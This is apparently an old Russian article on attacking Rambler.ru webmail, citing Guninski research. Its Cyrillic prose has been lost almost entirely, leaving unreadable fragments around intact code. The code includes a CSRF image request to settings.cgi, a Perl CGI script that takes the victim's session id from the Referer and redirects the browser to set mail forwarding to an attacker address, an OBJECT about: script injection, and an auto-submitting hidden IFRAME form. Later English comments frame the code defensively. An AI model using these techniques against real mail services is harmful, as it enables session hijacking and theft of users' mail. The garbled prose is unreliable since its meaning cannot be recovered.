  -     rambler.ru
Hi, ALL. 
 
 , ,  ,    ,         .       , ..       ,    . :)         , ..  ,      . 
 
       Web- (Rambler, HotBox  ..)  ,          - (HTTP),  IE,      (POP, SMTP). 
 
  Web-   ,    -.           ,      . ..        ,  Rambler,          Web-.            ,          . 
 
 :      /   .  ,          ,  , ,  .. ,   :   HTTP, Cookies, JScript, Perl (  'Hello world!'),   IE.    IE,    Web-            (    hut.ru, bip.ru  ..). 
 
         Rambler.ru     . 
 
-   Rambler'e   :  ,  cookie,    IP-        ,       ,      .   ,    'Submit',      POST     (  'settings.cgi'),  ,    ,    ,   cookie  IP-.  ,        POST,   GET.  ''     :    : 
 
HTML
<!-- An image tag whose SRC is a settings.cgi URL with set1/set2 query parameters.
     The browser fetches SRC with a GET request as soon as the markup is rendered.
     Defender's reading: an endpoint that changes account settings should not act
     on GET at all, and should require a per-session anti-CSRF token that a
     third-party page cannot know. Cookie or IP checks alone do not distinguish
     this request from one the user made deliberately. -->
<IMG SRC="www.server.ru/settings.cgi?set1=x&set2=y">

 set1=x, set2=y -      . 
 
         ,         'SRC=' ,       cookie  IP- .    ,    ( POST,  GET), ,     ,  ,   . ,     ,       ,    ,       1x1. 
 
    "password='my_password'",        , ..  ,   ,   , ..     : "password='my_password'&oldpassword='old_password'".     ,         ,    ,        .    . 
 
                .         ,       ,      -. ..       ""     ,              .       ?       ?     ,      Web-   ... 
 
,     ,     .   cookie, IP-        ,         'id=',             GET       (      'Address' ).          ,    POST,   GET,     ,       ,           .    - .     id  document.location      , ..     .   ,       CGI 'HTTP_REFERER'.  :   'IMG',          .       Perl (        CGI-  CGI-)      .   : 
 
Perl
# CGI script from the article, kept exactly as printed on the page.
# What the visible code does: reads the Referer of the incoming request, pulls
# the 'id' query parameter out of it, builds a settings.cgi URL that reuses
# that id, and answers with a page that immediately redirects the browser there.
# NOTE(review): presumably 'id' is the webmail session identifier carried in the
# URL - the surrounding prose is not readable here, confirm against the original.
# Defender's reading: identifiers placed in the query string are disclosed to
# every external resource through Referer. Keep session tokens out of URLs,
# send a restrictive Referrer-Policy, and require POST plus an anti-CSRF token
# (and the current password) before a forwarding address can be changed.
$ref = $ENV{'HTTP_REFERER'};         # Referer header of the incoming request, as exposed to CGI
$ref =~ /^.*\?id=([A-za-z0-9]*)\&/s; # capture the value of the 'id' query parameter into $1
$mail = 'my_mail@mail.ru';           # placeholder address used as the 'mailredir' value below
 
# settings.cgi URL carrying the captured id plus the mailredir and self parameters
$url = "http://www.server.ru/settings.cgi?id=$1&mailredir=$mail&self=yes; 
 
# Minimal HTML response: a meta refresh with delay 0 sends the browser to $url
print "Content-Type: text/html\n\n";
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL=$url\">";
print "</HEAD></HTML>";
 

 :      ,    ,    .   ,    CGI- 'HTTP_REFERER',   URL ,      "",   GET-. ..      id -  .          :  (id),   (mailredir)      (self).      -        . ,   ,  ,   ,     . 
 
         - URL      : "www.server.ru/redirect.cgi?url='some_url'". ..           (redirect.cgi),      'some_url'  ..    id  'HTTP_REFERER', ..          (www.server.ru/redirect.cgi),   . ..    - . 
 
 ,       , ..   POST  GET.     ,     ,       .    :     , ..        ,    ,        .    ,   ,    ,       ,-   ,           .  ,     ,    .      ? 
 
    -  . ,         ,     '<OBJECT>'. ,   ?                .          .    : 
 
HTML
<!-- An OBJECT element whose URL parameter is an about: URL with inline script;
     the script only calls alert(document.location), i.e. it displays the
     address of the document it runs in.
     NOTE(review): the classid appears to be the Internet Explorer Scriptlet
     component - confirm against the cited Guninski advisory.
     Defender's reading: a mail-body filter that removes only <SCRIPT> elements
     does not cover this form. Sanitize with an allow-list of tags and
     attributes, drop OBJECT/PARAM/IFRAME entirely, and reject about: and
     javascript: URLs in message content. -->
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389> 
 
<PARAM NAME="URL"
              VALUE="about:<SCRIPT>alert(document.location);</SCRIPT>">
</OBJECT>

 :       ,        MessageBox  URL ,      id. 
 
        JScript,       POST  (    ).   'write()'                         JScript  'Submit'. 
 
   : ,     ,   ,          .             ,       (<IFRAME>)  1x1.   , ,  ,          ,    , ..     .   ,   onload    : 
 
HTML
<!-- An IFRAME whose SRC is an about: URL holding a complete inline HTML document.
     The BODY onload handler submits the first form on that document, and the
     form uses METHOD='POST'; the form fields are elided in the listing.
     Defender's reading: accepting only POST does not by itself stop a request
     the user never intended, because a form can be submitted by script on load.
     The settings handler needs a per-session anti-CSRF token and should check
     Origin/Referer; the mail-body sanitizer should remove IFRAME elements and
     all on* event-handler attributes. -->
<IFRAME SRC="about:
<HTML>
<BODY onload='javascript:forms(0).submit();'>
<FORM METHOD='POST'>
...............
</FORM>
</BODY>
</HTML>
">

  ,  "" ,           ,     ,     .  ,  ""    (  -      ),  ,     . 
 
 ,     ,  :   CGI-,        ,       <IMG>    .   ,   ,       ,    . ,  .  - . 
 
    ,         Rambler'e...        .      : ,    ""       Rambler'e,     Rambler'e   , ..      .    ,         Rambler'e    ,      ,          . 
 
", ,  ,     ..." (-, " ") 
 
:
Georgi Guninski Security Research http://www.guninski.com/